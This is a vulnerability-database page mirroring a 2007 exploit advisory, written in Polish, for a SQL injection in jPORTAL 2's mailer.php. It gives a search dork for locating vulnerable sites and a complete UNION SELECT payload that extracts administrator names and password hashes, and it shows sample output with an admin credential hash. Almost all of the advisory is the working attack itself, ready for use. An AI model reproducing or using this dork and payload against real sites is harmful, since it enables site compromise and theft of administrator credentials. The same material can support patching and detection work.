Lucene search

K

jportal2-sql.txt

๐Ÿ—“๏ธย 07 Nov 2007ย 00:00:00Reported byย KacperTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 35ย Views

jPORTAL 2 Remote SQL Injection Vulnerability on mailer.ph

Show more
Code
`Tytul: jPORTAL 2 Remote SQL Injection Vulnerability  
dork:[ intext:"jPORTAL 2" & inurl:"mailer.php" ]  
  
Autor: Kacper  
E-Mail: [email protected]  
Strona: devilteam.eu  
  
Irc: irc.myg0t.com #devilteam  
  
Blad:  
  
mailer.php?to=999999999999'+union+select+0,1,2,3,4,5,concat(nick,char(58),pass),7+from+admins+limit+1/*  
  
po wykonaniu zapytania wystarczy zajrzec w xrodlo strony i poszukac:  
  
<input type="hidden" name="cmd" value="sendmail"><input type="hidden" name="to" value="admin:9b3a80a898fabc984e733d904027cc91"></td>  
  
value="admin:9b3a80a898fabc984e733d904027cc91" < ----/ to Twoj rezultat wykonania zapytania SQL.  
  
be safe all :)   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Nov 2007 00:00Current
7.4High risk
Vulners AI Score7.4
35
.json
Report